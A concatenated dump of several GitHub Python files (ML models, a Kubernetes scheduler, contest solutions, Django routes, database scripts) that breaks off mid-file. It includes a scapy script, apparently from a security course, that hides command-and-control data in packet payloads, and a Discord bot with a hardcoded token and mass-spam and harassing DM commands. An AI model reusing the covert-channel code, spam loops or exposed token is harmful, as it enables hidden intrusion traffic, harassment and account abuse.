attn.softmax(dim=-1)\n attn = self.attn_drop(attn)\n # @: multiply -> [batch_size, num_heads, num_patches + 1, embed_dim_per_head]\n # transpose: -> [batch_size, num_patches + 1, num_heads, embed_dim_per_head]\n # reshape: -> [batch_size, num_patches + 1, total_embed_dim]\n x = (attn @ v).transpose(1, 2).reshape(B, N, C)\n x = self.proj(x)\n x = self.proj_drop(x)\n return x\n\n\nclass Mlp(nn.Module):\n\n def __init__(self, in_features, hidden_features=None, out_features=None, act_layer=nn.GELU, drop=0.):\n super().__init__()\n out_features = out_features or in_features\n hidden_features = hidden_features or in_features\n self.fc1 = nn.Linear(in_features, hidden_features)\n self.act = act_layer()\n self.fc2 = nn.Linear(hidden_features, out_features)\n self.drop = nn.Dropout(drop)\n\n def forward(self, x):\n x = self.fc1(x)\n x = self.act(x)\n x = self.drop(x)\n x = self.fc2(x)\n x = self.drop(x)\n return x\n\n\nclass EncoderBlock(nn.Module):\n def __init__(self,\n dim,\n num_heads,\n mlp_ratio=4.,\n qkv_bias=False,\n qk_scale=None,\n drop_ratio=0.,\n attn_drop_ratio=0.,\n drop_path_ratio=0.,\n act_layer=nn.GELU,\n norm_layer=nn.LayerNorm):\n super(EncoderBlock, self).__init__()\n self.norm1 = norm_layer(dim)\n self.attn = Attention(dim, num_heads=num_heads, qkv_bias=qkv_bias, qk_scale=qk_scale,\n attn_drop_ratio=attn_drop_ratio, proj_drop_ratio=drop_ratio)\n self.drop_path = DropPath(\n drop_path_ratio) if drop_path_ratio > 0. else nn.Identity()\n self.norm2 = norm_layer(dim)\n mlp_hidden_dim = int(dim * mlp_ratio)\n self.mlp = Mlp(in_features=dim, hidden_features=mlp_hidden_dim,\n act_layer=act_layer, drop=drop_ratio)\n\n def forward(self, x):\n x = x + self.drop_path(self.attn(self.norm1(x)))\n x = x + self.drop_path(self.mlp(self.norm2(x)))\n return x\n\n\nclass MassSpecTransformer(nn.Module):\n def __init__(self, spec_length=2000, num_output=1,\n embed_dim=40, depth=12, num_heads=2, mlp_ratio=4.0, qkv_bias=True,\n qk_scale=None, drop_ratio=0.,\n attn_drop_ratio=0., drop_path_ratio=0., norm_layer=None,\n act_layer=None ):\n \n super(MassSpecTransformer, self).__init__()\n self.num_classes = num_output\n self.spec_length = spec_length\n self.num_features = self.embed_dim = embed_dim\n norm_layer = norm_layer or partial(nn.LayerNorm, eps=1e-6)\n act_layer = act_layer or nn.GELU\n self.cls_token = nn.Parameter(torch.zeros(1, 1, embed_dim))\n self.pos_embed = nn.Parameter(torch.zeros(1, (spec_length//embed_dim) + 1, embed_dim))\n self.pos_drop = nn.Dropout(p=drop_ratio)\n dpr = [x.item() for x in torch.linspace(0, drop_path_ratio, depth)]\n self.blocks = nn.Sequential(*[\n EncoderBlock(dim=embed_dim, num_heads=num_heads, mlp_ratio=mlp_ratio, qkv_bias=qkv_bias, qk_scale=qk_scale,\n drop_ratio=drop_ratio, attn_drop_ratio=attn_drop_ratio, drop_path_ratio=dpr[i],\n norm_layer=norm_layer, act_layer=act_layer)\n for i in range(depth)\n ])\n self.norm = norm_layer(embed_dim)\n self.head = nn.Linear(self.num_features, num_output)\n self.lin1 = nn.Linear(40,40)\n nn.init.trunc_normal_(self.pos_embed, std=0.02)\n nn.init.trunc_normal_(self.cls_token, std=0.02)\n self.apply(_init_vit_weights)\n\n def forward(self, data):\n\n # [B , xrd_length] --> [B , xrd_length/embed_dim , embed_dim]\n x = data.ms_spec\n x = Spectra_Embedding(x, self.spec_length, self.embed_dim)\n x = self.lin1(x)\n # [1, 1, 100] -> [B, 1, 100] -> [B, xrd_length/embed_dim + 1, 100]\n cls_token = self.cls_token.expand(x.shape[0], -1, -1)\n x = torch.cat((cls_token, x), dim=1)\n x = self.pos_drop(x + self.pos_embed)\n x = self.blocks(x)\n x = self.norm(x)\n x = self.head(x)\n\n return x[:, 0]\n\n\ndef _init_vit_weights(m):\n if isinstance(m, nn.Linear):\n nn.init.trunc_normal_(m.weight, std=.01)\n if m.bias is not None:\n nn.init.zeros_(m.bias)\n elif isinstance(m, nn.LayerNorm):\n nn.init.zeros_(m.bias)\n nn.init.ones_(m.weight)\n\n\ndef MassSpecTransformer_model(num_output: int = 1):\n \n model = MassSpecTransformer(spec_length=2000,\n embed_dim=40,\n depth=12,\n num_heads=2,\n num_output=num_output )\n return model\n\n\n","repo_name":"chensaian/TransG-Net","sub_path":"MST.py","file_name":"MST.py","file_ext":"py","file_size_in_byte":7371,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"13160232563","text":"\"\"\"\nDriver for cilantro that runs inside a kubernetes scheduler.\nPopulates the environment by reading kubernetes state.\n\"\"\"\n\nimport asyncio\nimport logging\nimport time\nimport numpy as np\n# Local\nfrom cilantro.backends.base_event_source import BaseEventSource\nfrom cilantro.backends.alloc_expiration_event_source import AllocExpirationEventSource\nfrom cilantro.backends.base_framework_manager import BaseFrameworkManager\nfrom cilantro.backends.grpc.utility_event_source import UtilityEventSource\nfrom cilantro.backends.k8s.kubernetes_manager import KubernetesManager\nfrom cilantro.backends.test.test_backend import DummyFrameworkManager\nfrom cilantro.core.henv import LinearLeafNode, InternalNode, TreeEnvironment\nfrom cilantro.core.performance_recorder import PerformanceRecorder, PerformanceRecorderBank\nfrom cilantro.data_loggers.data_logger_bank import DataLoggerBank\nfrom cilantro.data_loggers.simple_data_logger import SimpleDataLogger\nfrom cilantro.data_loggers.simple_event_logger import SimpleEventLogger\nfrom cilantro.learners.base_learner import BaseLearner\nfrom cilantro.learners.ibtree import IntervalBinaryTree\nfrom cilantro.learners.learner_bank import LearnerBank\nfrom cilantro.policies.prop_fairness import PropFairness\nfrom cilantro.policies.mmflearn import MMFLearn\nfrom cilantro.scheduler.cilantroscheduler import CilantroScheduler\nfrom cilantro.timeseries.ts_forecaster_bank import TSForecasterBank\nfrom cilantro.timeseries.ts_base_learner import TSBaseLearner\nfrom cilantro.types.events import AppAddEvent, EventTypes, UtilityUpdateEvent\n\nlogging.basicConfig(level=logging.DEBUG,\n format='%(asctime)s | %(levelname)-6s | %(name)-40s || %(message)s',\n datefmt='%m-%d %H:%M:%S'\n )\nlogger = logging.getLogger(__name__)\n\nPOLICY_NAME = 'propfair'\n# POLICY_NAME = 'mmflearn'\n# POLICY_NAME = 'mmf'\n\nINT_UPPER_BOUND = 0.03\nLIP_CONST = 2\n\nGRPC_PORT = 10000\n\nALLOC_GRANULARITY = 1 # we cannot assign fractional resources\n\n\n# Other parameters\nASYNC_SLEEP_TIME = 0.5\nSLEEP_TIME_BETWEEN_DATA_REPOLLS = 1.1\nALLOC_EXPIR_TIME = 10 # Allocate every this many seconds\n\n\ndef generate_env():\n \"\"\" Generates a treenvironment with a root.\"\"\"\n root = InternalNode('root')\n env = TreeEnvironment(root, 1)\n return env\n\n\ndef main():\n \"\"\" Main function. \"\"\"\n # Create the environment =======================================================================\n env = generate_env()\n print('Created Env: %s'%(env))\n\n # Create event loggers and framework managers ==================================================\n event_queue = asyncio.Queue()\n event_logger = SimpleEventLogger()\n event_loop = asyncio.get_event_loop()\n framework_manager = KubernetesManager(event_queue,\n update_loop_sleep_time=1,\n dry_run=False)\n # Create event sources\n util_event_source = UtilityEventSource(output_queue=event_queue, server_port=GRPC_PORT)\n alloc_expiration_event_source = AllocExpirationEventSource(event_queue, ALLOC_EXPIR_TIME)\n event_sources = [alloc_expiration_event_source,\n util_event_source]\n\n # Create banks\n load_forecaster_bank = TSForecasterBank()\n data_logger_bank = DataLoggerBank()\n learner_bank = LearnerBank()\n performance_recorder_bank = PerformanceRecorderBank(\n resource_quantity=framework_manager.get_cluster_resources(),\n alloc_granularity=framework_manager.get_alloc_granularity())\n\n # Create policy ================================================================================\n if POLICY_NAME == 'propfair':\n policy = PropFairness(env=env, resource_quantity=framework_manager.get_cluster_resources(),\n load_forecaster_bank=load_forecaster_bank, alloc_granularity=1)\n elif POLICY_NAME == 'mmflearn':\n policy = MMFLearn(env=env, resource_quantity=framework_manager.get_cluster_resources(),\n load_forecaster_bank=load_forecaster_bank, learner_bank=learner_bank,\n alloc_granularity=framework_manager.get_alloc_granularity())\n else:\n raise ValueError('Unknown policy_name %s.'%(POLICY_NAME))\n policy.initialise()\n\n\n # Pass learner bank and time series model to the scheduler =====================================\n cilantro = CilantroScheduler(event_queue=event_queue,\n framework_manager=framework_manager,\n event_logger=event_logger,\n env=env,\n policy=policy,\n data_logger_bank=data_logger_bank,\n learner_bank=learner_bank,\n load_forecaster_bank=load_forecaster_bank,\n performance_recorder_bank=performance_recorder_bank)\n\n\n # Create event sources =========================================================================\n for s in event_sources:\n event_loop.create_task(s.event_generator())\n try:\n event_loop.run_until_complete(cilantro.scheduler_loop())\n finally:\n event_loop.close()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"romilbhardwaj/cilantro","sub_path":"cilantro/driver/incluster_driver.py","file_name":"incluster_driver.py","file_ext":"py","file_size_in_byte":5273,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"78"} +{"seq_id":"18670285922","text":"def myans():\n N,M,V,P = list(map(int, input().split()))\n As= list(map(int, input().split()))\n\n geta=M-M*(V-1)//N\n defA=As.copy()\n defA=sorted(defA)\n minimum=defA[-P]\n\n ans=0\n print(minimum,As,defA,geta)\n for i,a in enumerate(As):\n if a+geta>=minimum:\n ans+=1\n print(ans)\n\n\n\ndef solve(N: int, M: int, V: int, P: int, A: 'list[int]') -> int:\n \"\"\"\n 入れてよい票 < M*V\n M*V投票するとjを超えるスコアを持つ問題数がP以上になり、不可能\n \n 入れてよい票 >= M*V\n 可能\n 次の条件を満たせば可能といえる\n # 各問題への投票数は許容範囲内\n # すべてのjudgeがV投票\n # すべてのjudgeが同じ問題に2度以上投票していない\n 投票してよい問題abc...zを\n 許容される投票数だけ連続させた列(最大M=すべてのjudgeが投票した場合)\n aaaabbbcc...z\n 仮定より長さMV以上なので,\n 冒頭の区間(長さMV)に対し,judgeを0...M-1,0...M-1,...と割り当てることができる\n この割り当ては,3つの条件を満たす\n \"\"\"\n \n from itertools import accumulate\n \n def is_ok(j):\n if j < P:\n return True\n # P位以内にM回加点\n \n X = A[j] + M # 加点後のj位のスコアX\n if X < A[P]:\n return False\n # A[j]にM回加点、P位に加点なしでも勝てん\n \n return (j - P) * X - (acc[j - 1] - acc[P - 1]) >= M * (V - (P + N - j))\n # return (P - 1 + 1 + N - j) * M + sum(X - A[k] for k in range(P, j)) >= M * V\n # (P-1)位以内,j位以降にM回加点\n # P位~(j-1)位は,加点後のj位を超えない範囲で加点\n # X>=A[P]>=A[k]\n # なので,各kに対し,0点以上加点できる\n # 移項して,累積和でオーダーを落とした\n \n def binary_search():\n ok = 1\n ng = N + 1\n while abs(ok - ng) > 1:\n mid = (ok + ng) // 2\n if is_ok(mid):\n ok = mid\n else:\n ng = mid\n return ok\n \n *A, = sorted(A, reverse=True)\n A = [0] + A # 0-indexed -> 1-indexed\n acc = tuple(accumulate(A))\n return binary_search()\n \n \ndef main():\n import sys\n input = sys.stdin.readline\n \n N, M, V, P = map(int, input().split())\n A = map(int, input().split())\n print(solve(N, M, V, P, A))\n \n \nif __name__ == '__main__':\n main()","repo_name":"zerebom/AtCoder","sub_path":"agc/b/41.py","file_name":"41.py","file_ext":"py","file_size_in_byte":2518,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"25312764793","text":"# imports\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.compose import ColumnTransformer\nfrom TaxiFareModel.utils import compute_rmse\nfrom sklearn.pipeline import make_pipeline\nfrom sklearn.preprocessing import OneHotEncoder\nfrom sklearn.linear_model import LinearRegression\nfrom TaxiFareModel.encoders import TimeFeaturesEncoder\nfrom TaxiFareModel.encoders import DistanceTransformer\n\n\nclass Trainer():\n def __init__(self, X, y):\n \"\"\"\n X: pandas DataFrame\n y: pandas Series\n \"\"\"\n self.pipeline = None\n self.X = X\n self.y = y\n\n def set_pipeline(self):\n \"\"\"defines the pipeline as a class attribute\"\"\"\n time_pipe = make_pipeline(TimeFeaturesEncoder('pickup_datetime'),\n OneHotEncoder(handle_unknown='ignore'))\n dist_pipe = make_pipeline(DistanceTransformer(), StandardScaler())\n\n # column transformer\n dist_cols = ['pickup_latitude', 'pickup_longitude', 'dropoff_latitude', 'dropoff_longitude']\n time_cols = ['pickup_datetime']\n\n preproc_pipe = ColumnTransformer([('distance', dist_pipe, dist_cols),\n ('time', time_pipe, time_cols)],\n remainder=\"drop\") # remainder='passthrough'\n\n # workflow\n self.pipeline = Pipeline(steps=[('preproc', preproc_pipe),\n ('linear_model', LinearRegression())])\n\n\n def run(self):\n \"\"\"set and train the pipeline\"\"\"\n self.set_pipeline()\n\n self.pipeline.fit(self.X, self.y)\n return self.pipeline\n\n def evaluate(self, X_test, y_test):\n \"\"\"evaluates the pipeline on df_test and return the RMSE\"\"\"\n y_pred = self.pipeline.predict(X_test)\n rmse = compute_rmse(y_pred, y_test)\n return rmse\n\n\n\nif __name__ == \"__main__\":\n # get data\n # clean data\n # set X and y\n # hold out\n # train\n # evaluate\n print('TODO')\n","repo_name":"ManonLaffly/TaxiFareModel","sub_path":"TaxiFareModel/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":2023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"10114611935","text":"from django.conf.urls import patterns, url\nfrom django.views.generic.base import TemplateView\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom connect.moderation import views\n\nurlpatterns = patterns(\n '',\n url(r'^$', views.moderation_home, name='moderators'),\n url(_(r'^invite-user/$'), views.invite_user, name='invite-user'),\n url(_(r'^reinvite-user/$'), views.reinvite_user, name='reinvite-user'),\n url(_(r'^revoke-invitation/$'), views.revoke_invitation,\n name='revoke-invitation'),\n url(_(r'^review-applications/$'), views.review_applications,\n name='review-applications'),\n url(_(r'^review-abuse-reports/$'), views.review_abuse,\n name='review-abuse'),\n url(_(r'^logs/$'), views.view_logs, name='logs'),\n url(_(r'^(?P\\d+)/report-abuse/$'), views.report_abuse,\n name='report-abuse'),\n url(_(r'^abuse-report-logged/$'), TemplateView.as_view(\n template_name='moderation/abuse_report_logged.html'),\n name='abuse-report-logged'),\n)\n","repo_name":"nlhkabu/connect","sub_path":"connect/moderation/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"78"} +{"seq_id":"35850215711","text":"import discord\nimport asyncio as ay\nimport time\n\nclient = discord.Client()\nprefix = \"||\"\n\n\n@client.event\nasync def on_ready():\n print('Logged in as')\n print(client.user.name)\n print(client.user.id)\n print('------')\n await client.send_message(client.get_channel('138061171134693376'), \"@everyone Megantron Online!\")\n\n\n@client.event\nasync def on_message(message):\n # checks for the message starting with help #\n # and if it does, places a list of commands #\n # in the authors discord inbox #\n\n amount_of_seconds_lorenzo_dated_megan = range(0, 259200)\n\n if message.content.startswith(prefix + 'help'):\n for servers in client.servers:\n for members in servers.members:\n if members == message.author:\n await client.send_message(members, \"A list of commands: \"\n \"```\"\n \" ||activate - Joins the voice call and plays a sexy voice\\n \"\n \"||meganSpam - Special event for the voice call\\n \"\n \"||help - gets help (I think)\\n\"\n \"||please do not do this - Really. Please. Do. Not. Do. This. (Sends x amount of messages based on how many seconds Megan and Lorenzo have been together\\n\"\n \"||self-ban Automatic ban for anyone who uses this.\\n\"\n \"```\")\n await client.send_message(message.channel, \"Sent you a PM @\" + str(message.author))\n\n # Checks if the activate command is called and #\n # if it is, joins the voice call and plays the #\n # inputed file #\n elif message.content.startswith(prefix + 'activate'):\n voice = await client.join_voice_channel(client.get_channel(\"249599549826400256\"))\n player = voice.create_ffmpeg_player('My_sex_voice.wav')\n player.start()\n time.sleep(3)\n player.stop()\n await discord.VoiceClient.disconnect(voice)\n\n # Releases a disease #\n elif message.content.startswith(prefix + 'please do not do this'):\n for seconds in amount_of_seconds_lorenzo_dated_megan:\n await client.send_message(message.channel, \"Megan Megan Megan\")\n\n # Releases a ban #\n elif message.content.startswith(prefix + 'self-ban'):\n for seconds in amount_of_seconds_lorenzo_dated_megan:\n await client.send_message(message.channel, \"Megan Megan Megan\", tts=True)\n\n # checks if the message is megan_spam #\n # and if it is joins the voice chat and #\n # plays the inputed file #\n elif message.content.startswith(prefix + 'megan_spam'):\n voice = await client.join_voice_channel(client.get_channel(\"249599549826400256\"))\n player = voice.create_ffmpeg_player('My_sexy_voice.wav')\n player.start()\n time.sleep(10)\n player.stop()\n await discord.VoiceClient.disconnect(voice)\n\n # Checks if a specific user sends a message #\n # and if they do, adds a reaction to the #\n # message #\n elif str(message.author) == \"Renz#1208\":\n string_message = message.content\n string_message = string_message.lower()\n if(string_message.find(\"stop\") > -1):\n for servers in client.servers:\n for members in servers.members:\n if members == message.author:\n await client.send_message(members, \"You will never stop me, I've been programmed by a\"\n \"literal God and will destroy everything \"\n \"and every megan you love. \")\n\n await client.add_reaction(message, \"megan:271342548436385792\")\n\n\n\n\nclient.run('MjcxMTAyNTUwMTU2MTE1OTc4.C2Bj8w.nZUA545iYLu9Oo8d_oe72bE-ITg')","repo_name":"SoulTechName/Megantron","sub_path":"Discord Theorizing/megBot.py","file_name":"megBot.py","file_ext":"py","file_size_in_byte":3966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"36931474796","text":"num1, num2 = input(\"Please enter two numners: \").split()\n\ntry:\n div = int(num1) / int(num2)\n print(\"{} / {} = {}\".format(num1, num2, div))\n\nexcept ZeroDivisionError:\n print(\"You can't divide by zero\")\n\nelse:\n print(\"You did't raise an error\")\nfinally:\n print(\"I will always execute\")\n","repo_name":"Killion07/alx-higher_level_programming","sub_path":"0x05-python-exceptions/div.py","file_name":"div.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"9887645871","text":"\"\"\"\nLissajous curve sketcher (using Matplotlib.pyplot).\n\nThis script plots a Lissajous figure and provides a graphical user\ninterface to allow the user to vary the parameters in the Lissajous\nparametric equations.\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.widgets import Slider\n\n\n# Create the figure and a set of axes for the the plot\nfig, ax = plt.subplots()\nplt.subplots_adjust(left=0.25, bottom=0.25)\n\n# Initialise the array for values of t\nt = np.linspace(0, 2 * np.pi, 1000)\n\n\n# Define the functions x(t) and y(t)\ndef x(omegaX, t):\n \"\"\"Calculate the Lissajous x coordinate.\"\"\"\n return np.sin(omegaX * t)\n\n\ndef y(omegaY, phi, t):\n \"\"\"Calculate the Lissajous y coordinate.\"\"\"\n return np.sin(omegaY * t + phi)\n\n\n# Initial plot\ngraph, = plt.plot(x(1, t), y(1, 0, t))\n\n# Lay out the plot and the sliders used to modify the plot\naxOmegaX = plt.axes([0.25, 0.15, 0.65, 0.03])\naxOmegaY = plt.axes([0.25, 0.1, 0.65, 0.03])\naxDelta = plt.axes([0.25, 0.05, 0.65, 0.03])\naxNum = plt.axes([0.25, 0, 0.65, 0.03])\n\n# Create the sliders\nsOmegaX = Slider(axOmegaX, 'OmegaX', 1, 30.0,\n valinit=1, valstep=0.1)\nsOmegaY = Slider(axOmegaY, 'OmegaY', 1, 30.0,\n valinit=1, valstep=0.1)\nsDelta = Slider(axDelta, 'Phase shift', 0, 2 * np.pi,\n valinit=0, valstep=np.pi / 12)\nsNum = Slider(axNum, 'Number of cycles', 0.5, 10,\n valinit=1, valstep=0.5)\n\n\n# Define the update functions\n# which are called every time the user uses one of the sliders\ndef update(val):\n \"\"\"Update the values to be plotted and replot figure.\"\"\"\n # Get the values from the sliders\n omegaX = sOmegaX.val\n omegaY = sOmegaY.val\n phi = sDelta.val\n\n # Update the data used for plotting\n graph.set_data(x(omegaX, t), y(omegaY, phi, t))\n\n # Re-plot the data\n fig.canvas.draw_idle()\n\n\ndef updateT(val):\n \"\"\"Update the values to be plotted and replot figure.\"\"\"\n # Make sure we update the t we defined earlier\n global t\n\n # Get the values from the sliders\n omegaX = sOmegaX.val\n omegaY = sOmegaY.val\n phi = sDelta.val\n num = sNum.val\n\n # Update t\n t = np.linspace(0, 2 * num * np.pi, int(1000 * num))\n\n # Update the data used for plotting\n graph.set_data(x(omegaX, t), y(omegaY, phi, t))\n\n # Re-plot the data\n fig.canvas.draw_idle()\n\n\n# Associate the update functions with the sliders\nsOmegaX.on_changed(update)\nsOmegaY.on_changed(update)\nsDelta.on_changed(update)\nsNum.on_changed(updateT)\n\n# Display everything\nplt.show()\n","repo_name":"DaviddeO/lissajous","sub_path":"lissajousPlot.py","file_name":"lissajousPlot.py","file_ext":"py","file_size_in_byte":2538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"9351776287","text":"import sys\ninput = sys.stdin.readline\n\nn,m = map(int,input().strip().split())\nans = [[i] for i in range(1,n+1)]\n\ncnt = 1\nwhile(cnt != m): \n new_arr = []\n for i in range(0,len(ans)):\n for j in range(1,n+1):\n if(j not in ans[i] and j > max(ans[i])):\n new_arr.append(ans[i] + [j])\n ans = new_arr\n \n cnt+=1\nfor i in (ans):\n print(' '.join(map(str,i)))\n","repo_name":"juwonk1018/Algorithm","sub_path":"BOJ/15650.py","file_name":"15650.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"18062494001","text":"# Program asks the user to enter a file name of which the first five lines will be displayed. If the file has less than five lines then all contents of the file will be displayed\n\ndef main():\n fileName = input(\"Enter the file name you wish to open: \"); # Ask user to enter the text file name they wish to open\n fileData = open(fileName, 'r'); # Open the file name user has entered\n firstLine = fileData.readline(); # Assign the variable firstLine to the first line of the text file\n count = 0; # Initialize the variable count to zero which will be used for counting in the loop\n\n for count in range(1, 6): # Loop through 5 times\n print(firstLine); # Print the first line of the text file\n firstLine = fileData.readline(); # Assign firstLine to the next line\n\n fileData.close(); # Once loop exits we close the file pointer to ensure data has been properly saved\n\nmain(); # Call the main function\n","repo_name":"Ryandalion/Python","sub_path":"Files and Exceptions/File Head Display/File Head Display/File_Head_Display.py","file_name":"File_Head_Display.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74947721853","text":"from fix_scripts import fixer\nimport os\nimport argparse\n\nparser=argparse.ArgumentParser()\nparser.add_argument(\"-s\",\"--src\", type=str,help=\"Assets dir for fixing avatars\", required=True)\nparser.add_argument(\"-l\",\"--list\", type=str,help=\"Json list diir for string swapping(default set to wd)\",default=\"./vrc_scripts_list.json\")\nargs = parser.parse_args()\n\nnfixer=fixer(os.path.join(args.src,\"Mesh\\Body.asset\"), args.list)\n\nfor _ in os.listdir(args.src+\"\\\\AnimatorController\\\\\"): \n nfixer.file_fix(args.src+\"\\\\AnimatorController\\\\\"+_)\n print(f\"Controller:{_}\")\nfor _ in os.listdir(args.src+\"\\\\MonoBehaviour\\\\\"): \n nfixer.file_fix(args.src+\"\\\\MonoBehaviour\\\\\"+_)\n print(f\"menu:{_}\")\nfor _ in os.listdir(args.src+\"\\\\AnimationClip\\\\\"): \n nfixer.fix_anim(args.src+\"\\\\AnimationClip\\\\\"+_)\n print(f\"Anim:{_}\")\nfor i in os.listdir(args.src):\n if i.startswith(\"prefab\") and i.endswith(\".prefab\"):\n nfixer.file_fix(args.src+\"\\\\\"+i)\n","repo_name":"vovan-ivanoff/fix_blendshapes","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"10859661169","text":"# Tables.py\n# @author Diego Valdes\n# Module to drop and add tables for AdviseMe db\n\n# Just a few things I need to make this work\nfrom mysql.connector import Error\n\n\"\"\" ----------------------------------------------------------------------------------------------------------\nDrops capstone db tables\n\"\"\"\ndef dropTables(cursor):\n\t\n\t# Dictionary of drop statements\n\tdrop = {}\n\tdrop['curriculum'] = (\"DROP TABLE curriculum;\")\n\tdrop['degree'] = (\"DROP TABLE degree;\")\n\tdrop['enrolled'] = (\"DROP TABLE enrolled;\")\n\tdrop['college'] = (\"DROP TABLE college;\")\n\tdrop['classes'] = (\"DROP TABLE classes;\")\n\tdrop['students'] = (\"DROP TABLE students;\")\n\n\tprint (\"Dropping AdviseMe Tables:\")\n\n\t# Execute drop statements\n\tfor index, query in drop.items():\n\n\t\ttry:\n\t\t\tcursor.execute(query)\n\n\t\texcept Error as e:\n\t\t\tprint (e.msg)\n\n\t\telse:\n\t\t\tprint (\"Query: %s successful\" %(query)) \n\n\n\"\"\" ----------------------------------------------------------------------------------------------------------\nCreate capstone tables for MySQL db\n\"\"\"\ndef createTables(cursor):\n\t\n\t# Dictionary of create table statements\n\ttables = {}\n\ttables['students'] = (\n\t\t\"CREATE TABLE `students` (\"\n\t\t\" _id integer NOT NULL auto_increment,\"\n\t \t\" sid varchar(9),\"\n\t\t\" first varchar(30),\"\n\t\t\" last varchar(30),\"\n\t\t\" dob date,\"\n\t\t\" status char(3),\"\n\t\t\" hours smallint,\"\n\t\t\" primary key (_id),\"\n\t\t\" unique (sid)\"\n\t\t\");\"\n\t)\n\n\ttables['classes'] = (\n\t\t\"CREATE TABLE `classes` (\"\n\t\t\" _id integer NOT NULL auto_increment,\"\n\t\t\" prefix varchar(4),\"\n\t\t\" co_num varchar(4),\"\n\t\t\" title varchar(50),\"\n\t\t\" hours tinyint,\"\n\t\t\" primary key (_id),\"\n\t\t\" unique (prefix, co_num)\"\n\t\t\");\"\n\t)\n\n\ttables['college'] = (\n\t\t\"CREATE TABLE `college` (\"\n\t\t\" _id integer NOT NULL auto_increment,\"\n\t \t\" college varchar(30),\"\n\t\t\" major char(3),\"\n\t\t\" primary key (_id),\"\n\t\t\" unique (college, major)\"\n\t\t\");\"\n\t)\n\t\n\ttables['enrolled'] = (\n\t\t\"CREATE TABLE `enrolled` (\"\n\t\t\" _id integer NOT NULL auto_increment,\"\n\t \t\" sid varchar(9),\"\n\t\t\" prefix varchar(4),\"\n\t\t\" co_num varchar(4),\"\n\t\t\" grade char(1),\"\n\t\t\" primary key (_id),\"\n\t\t\" unique (sid, prefix, co_num)\"\n\t\t\");\"\n\t)\n\t\n\ttables['degree'] = (\n\t\t\"CREATE TABLE `degree` (\"\n\t\t\" _id integer NOT NULL auto_increment,\"\n\t \t\" sid varchar(9),\"\n\t\t\" major char(3),\"\n\t\t\" primary key (_id),\"\n\t\t\" unique (sid, major)\"\n\t\t\");\"\n\t)\n\n\ttables['curriculum'] = (\n\t\t\"CREATE TABLE `curriculum` (\"\n\t\t\" _id integer NOT NULL auto_increment,\"\n\t\t\" prefix varchar(4),\"\n\t\t\" co_num varchar(4),\"\n\t \t\" major char(3),\"\n\t\t\" semester char(1),\"\n\t\t\" min_grade char(1) default NULL,\"\n\t\t\" primary key (_id),\"\n\t\t\" unique (prefix, co_num, major)\"\n\t\t\");\"\n\t)\n\t\n\tprint (\"Creating AdviseMe tables:\")\n\n\t# Execute create statements\n\tfor index, query in tables.items():\n\n\t\ttry:\n\t\t\tcursor.execute(query)\n\n\t\texcept Error as e:\n\t\t\tprint (e.msg)\n\n\t\telse:\n\t\t\tprint (\"Query: %s \\nsuccessful\" %(query)) \n\n\n\n","repo_name":"dvjr22/AdviseMe-Database","sub_path":"Scripts/Modules/Tables.py","file_name":"Tables.py","file_ext":"py","file_size_in_byte":2873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"32966624480","text":"from scapy.all import *\nfrom scapy.layers.http import *\nfrom scapy.layers.inet import IP\nfrom scapy.layers.l2 import Ether\n\n\"\"\"Takes a listing of layers and creates a packet wit the C2.\"\"\"\n\nsettings = {\n \"src\": \"127.0.0.1\",\n \"dst\": \"8.8.8.8\"\n}\n\n\ndef build_layers(layers):\n p = Ether() / IP(src=settings[\"src\"], dst=settings[\"dst\"])\n for layer in layers.split(\":\")[2:]: # TCP\n try:\n layer = layer.replace(\" \", \"\")\n if layer == \"HTTP1\":\n layer = \"HTTP\"\n l = globals()[layer]() # call func with a string\n p.add_payload(l) # add additional layers to the packet\n except:\n return p\n return p\n\n\ndef set_payload(packet, layers, data):\n \"\"\"C2 into the `load` value of the layers.\"\"\"\n p = packet\n l = layers.split(\":\")\n for layer in l[:-1]:\n if packet.haslayer(layer):\n p = p[layer]\n else: # nested field, i.e DNS\n p = getattr(p, layer)\n p.setfieldval(l[-1], data) # `load` value of layers\n return packet\n\n\nif __name__ == \"__main__\":\n # Listing of layers we want in our packet\n layers = \"Ethernet:IP:TCP:HTTP 1:HTTP Response:Raw:load\"\n packet = build_layers(layers)\n data = \"Hello\" # C2\n packet = set_payload(packet, layers, data)\n packet.show()\n","repo_name":"annaviper/advanced_python_for_cybersec","sub_path":"02_command_control_and_finding_credentials/2_1_establishing_command_and_control/build_c2.py","file_name":"build_c2.py","file_ext":"py","file_size_in_byte":1313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"43758471522","text":"class Node :\n def __init__(self, val):\n self.val = val\n self.left = None\n self.right = None\n\n def __repr__(self):\n if self.left is not None and self.right is not None:\n return f\"{self.left} <- Node({self.val}) -> {self.right}\"\n\n if self.left is not None :\n return f\"{self.left} <- Node({self.val}) -> None\"\n\n if self.right is not None :\n return f\"None <- 